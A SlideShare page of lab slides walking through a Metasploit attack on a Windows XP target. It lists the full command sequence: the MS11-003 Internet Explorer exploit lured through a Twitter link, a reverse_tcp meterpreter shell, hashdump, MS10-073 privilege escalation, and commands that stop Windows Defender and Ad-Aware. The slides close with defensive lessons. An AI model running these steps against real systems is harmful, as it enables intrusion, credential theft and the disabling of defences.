Metasploit Scenarios                                                         Scenario 2Http:://eromang.zataz.com - Http://...
Scenario 2 : Topology           Target                         Firewall                     Attacker                      ...
Scenario 2 : Firewall rules• Firewall administration by SSH only from internal network• Internal network is allowed to req...
Scenario 2 : Story-Board✤   This network topology is corresponding to most of broadband ADSL Internet connexions for home ...
Scenario 2 : Story-Board✤   Attacker send a Twitter message to the target. The message contain a malicious URL (could be s...
Scenario 2 : Metasploit commandsuse exploit/windows/browser/ms11_003_ie_css_importset SRVHOST 192.168.178.21set SRVPORT 80...
Scenario 2 : Metasploit commandsuse post/windows/escalate/ms10_073_kbdlayoutset SESSION 1runsessions -i 1getuidmigrate X -...
Scenario 2 : Leasons Learned•Update your OS and applications !•Never click on unknown links, specialy shortened URL’s, fro...
Upcoming SlideShare
Loading in …5
×

Metasploit Exploitation Scenarios -EN : Scenario 2

2,016 views

Published on

Second scenario from the metasploit scenarios series

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
2,016
On SlideShare
0
From Embeds
0
Number of Embeds
273
Actions
Shares
0
Downloads
84
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • Metasploit Exploitation Scenarios -EN : Scenario 2

    1. 1. Metasploit Scenarios Scenario 2Http:://eromang.zataz.com - Http://twitter.com/eromang
    2. 2. Scenario 2 : Topology Target Firewall Attacker Gateway 192.168.111.0/24 192.168.178.0/24 Target : - Windows XP SP3 - User «test» has limited account profile - IP : 192.168.111.129 - Default gateway : 192.168.111.128 - Antivirus : Ad-Aware Free / Windows Defender - Local Windows Firewall activated - Vulnerable to MS11-003 & MS10-073 Firewall Gateway : - Eth0 : 192.168.111.128 (internal interface) - Eth1 : 192.168.178.59 (external interface) Attacker : - IP : 192.168.178.21
    3. 3. Scenario 2 : Firewall rules• Firewall administration by SSH only from internal network• Internal network is allowed to request «Any» protocols to external network
    4. 4. Scenario 2 : Story-Board✤ This network topology is corresponding to most of broadband ADSL Internet connexions for home users, and SMB.✤ Target has three active local countermeasure softwares : As you will see they don’t react to anything ! ✤ Up-to-date Ad-Aware Free with default configuration. ✤ Windows Defender with default configuration. ✤ Windows Firewall with default configuration.✤ Target is vulnerable to MS11-003 Internet Explorer vulnerability and to MS10-073 Keyboard Layout vulnerability ✤ MS11-003 will be our entry point ✤ MS10-073 our privileges escalation vector. (Stuxnet)
    5. 5. Scenario 2 : Story-Board✤ Attacker send a Twitter message to the target. The message contain a malicious URL (could be shortened) in order to exploit Internet Explorer MS11-003 vulnerability.✤ The target click on the provided link and MS11-003 is exploited. After the exploitation a reverse_tcp meterpreter payload, on port 4444/TCP, is launched.✤ Attacker will check the installed countermeasures, try to kill them without success, due to the limited privileges.✤ Attacker has to check if these Microsoft patches are installed, in order to do the MS10-073 privilege escalation ✤ MS11-012 (KB2479628) / MS10-098 (KB2436673) / MS10-073 (KB981957) ✤ If any of these patches are installed the MS10-073 privilege escalation is not possible. winenum is the solution.✤ Attacker will then execute the post exploitation MS10-073 privileges escalation.✤ Attacker will stop the following services : Windows Defender / Lavasoft Ad-Aware Service
    6. 6. Scenario 2 : Metasploit commandsuse exploit/windows/browser/ms11_003_ie_css_importset SRVHOST 192.168.178.21set SRVPORT 80set URIPATH /readme.htmlset PAYLOAD windows/meterpreter/reverse_tcpset LHOST 192.168.178.21exploitmigrate X -> to another processkill X -> 2 times -> notepad.exe & main iexplorer.exe processesrun getcountermeasurerun getcountermeasure -kgetuidshellecho %USERNAME%getprivsgetsystemhashdumpsysinfoipconfigroutebackground
    7. 7. Scenario 2 : Metasploit commandsuse post/windows/escalate/ms10_073_kbdlayoutset SESSION 1runsessions -i 1getuidmigrate X -> to a «NT AUTHORITYSYSTEM» processshellecho %USERNAME%net startnet stop "Lavasoft Ad-Aware Service"net stop "Windows Defender"net startps
    8. 8. Scenario 2 : Leasons Learned•Update your OS and applications !•Never click on unknown links, specialy shortened URL’s, from unknown sources !•Don’t trust your antivirus ! Select antivirus how detect basic attacks !•Don’t trust your Firewalls (Local or remote) !•Don’t allow «Any» outbound protocols connexions from your internal network tountrusted networks ! Limit your outbound connexions to your real needs. 8

    ×